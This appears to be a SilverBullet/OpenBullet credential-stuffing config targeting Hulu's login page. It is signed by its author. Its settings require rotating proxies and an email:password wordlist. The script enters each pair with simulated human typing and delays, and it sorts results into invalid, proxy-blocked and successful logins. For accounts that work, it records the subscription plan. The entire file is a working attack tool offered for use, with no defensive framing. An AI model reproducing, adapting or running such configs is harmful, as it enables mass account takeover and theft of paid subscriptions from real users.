[SETTINGS]
{
  "Name": "hulu-selenium",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-01-06T20:54:45.0773618+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "hulu-selenium",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Open 

NAVIGATE "https://auth.hulu.com/web/login" 

#1 FUNCTION Delay "2000" 

ELEMENTACTION XPath "//*[@id=\"email_id\"]" 
  Click 

ELEMENTACTION XPath "//*[@id=\"email_id\"]" 
  SendKeys "<USER>" 

#2 FUNCTION Delay "2000" 

ELEMENTACTION XPath "//*[@id=\"password_id\"]" 
  Click 

ELEMENTACTION XPath "//*[@id=\"password_id\"]" 
  SendKeysHuman "<PASS>" 

#3 FUNCTION Delay "2000" 

ELEMENTACTION XPath "//*[@id=\"__next\"]/div/div/div[2]/div/div[1]/div/button" 
  Click 

#4 FUNCTION Delay "2000" 

BROWSERACTION DOMtoSOURCE "<SOURCE>" 

#5 FUNCTION Delay "2000" 

#6 FUNCTION Delay "2000" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Error: Your login is invalid. Please try again." 
    KEY "403" 
  KEYCHAIN Retry OR 
    KEY "Error: Hulu is available in the U.S. only, and cannot be used with an anonymous proxy service." 
  KEYCHAIN Success OR 
    KEY "https://secure.hulu.com/account" 
    KEY "https://www.hulu.com/profiles?next=/" 

NAVIGATE "https://secure.hulu.com/account" 

#7 FUNCTION Delay "2000" 

ELEMENTACTION XPath "/html/body/div[1]/div[1]/main/div[2]/div/div/section[1]/div/div[2]/div[1]/span/h2" 
  WaitForElement 

ELEMENTACTION XPath "/html/body/div[1]/div[1]/main/div[2]/div/div/section[1]/div/div[2]/div[1]/span/h2" 
  GetText -> CAP "PLAN" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

